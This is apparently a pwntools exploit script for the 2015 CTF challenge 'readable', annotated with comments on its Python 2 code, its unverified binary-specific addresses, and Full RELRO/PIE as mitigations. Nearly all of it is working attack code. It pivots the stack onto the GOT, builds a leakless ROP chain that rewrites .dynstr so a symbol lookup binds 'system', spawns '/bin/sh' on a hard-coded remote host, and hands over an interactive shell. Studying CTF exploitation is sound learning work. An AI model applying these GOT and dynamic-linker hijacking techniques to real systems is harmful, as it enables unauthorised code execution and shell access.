# pwntools exploit script for a 2015 CTF binary ("readable").  Python 2 code:
# raw_input() is a Python 2 builtin, and the payloads concatenate str with
# p64() output, which under Python 3 pwntools (bytes) would raise TypeError.
# The author's own comments describe the approach: pivot the stack onto the
# GOT, retarget __libc_start_main, and rewrite .dynstr so a later lookup binds
# a different symbol.  All addresses are binary-specific (non-PIE text at
# 0x40xxxx, data at 0x60xxxx) and cannot be checked from this gist alone;
# every "# read to ..." comment below is the author's claim, not a verified fact.
# Mitigation context for readers: the technique depends on a writable GOT /
# dynamic-linking metadata and fixed addresses; Full RELRO (-z relro -z now)
# and PIE remove that surface, which is why modern toolchains enable both.
from pwn import *
#r = process("./readable")
# Hard-coded host/port from the original event (a local process() is the
# commented-out alternative above).
r = remote("52.68.53.28", 56746)
# pivot the stack to the GOT to overwrite target of __libc_start_main, then call start
# 0x10 bytes of filler, then two 8-byte values (a data address, a text address);
# which saved register each one lands in is not stated by the author.
payload1 = "A"*0x10 + p64(0x600900) + p64(0x400505)
r.send(payload1)
# Manual pause between stages — the script waits on the operator, not on any
# response from the target.
raw_input("> ")
payload2 = p64(0x400511) + "A"*8 + p64(0x600900) + p64(0x400416)
r.send(payload2)
# leakless
# dynstr at 0x600780
# point it at 0x600a60
# The chain is built by repeated str concatenation; fine at this size, but
# "".join(parts) is the usual idiom if the chain grows.
chain = ""
# read to 0x600780
# 30 repeats of the same address; the author does not say what it does.
chain += p64(0x400456)*30
chain += p64(0x400591)
chain += p64(0x600780)
chain += p64(0x0)
chain += p64(0x4003E0)
# read to 0x6008f0
chain += p64(0x400591)
chain += p64(0x6008F0)
chain += p64(0x0)
chain += p64(0x4003E0)
# call libcstart (system) with /bin/sh
chain += p64(0x400593)
chain += p64(0x600a38)
chain += p64(0x4003F0)
# NUL-terminated strings placed in the chain so they land at the addresses the
# author references above (0x600a38 / 0x600a60 by the author's comments — unverified).
chain += "/bin/sh\x00"
chain += "A"*8*6          # padding: 6 qwords
chain += "system\x00" + "A"*300
r.send(chain + "\n")
# Fixed 0.3 s delays instead of waiting for output: the follow-up sends are
# timing-dependent and may race the remote reads on a slow link.  `time` is
# only in scope via `from pwn import *`.
time.sleep(0.3)
# send what I'm writing to dynstr
r.send(p64(0x600a60))
time.sleep(0.3)
# send what I'm writing to libcstart
r.send(p64(0x4003F6))
# Hand the socket to the operator; no success check precedes this.
r.interactive()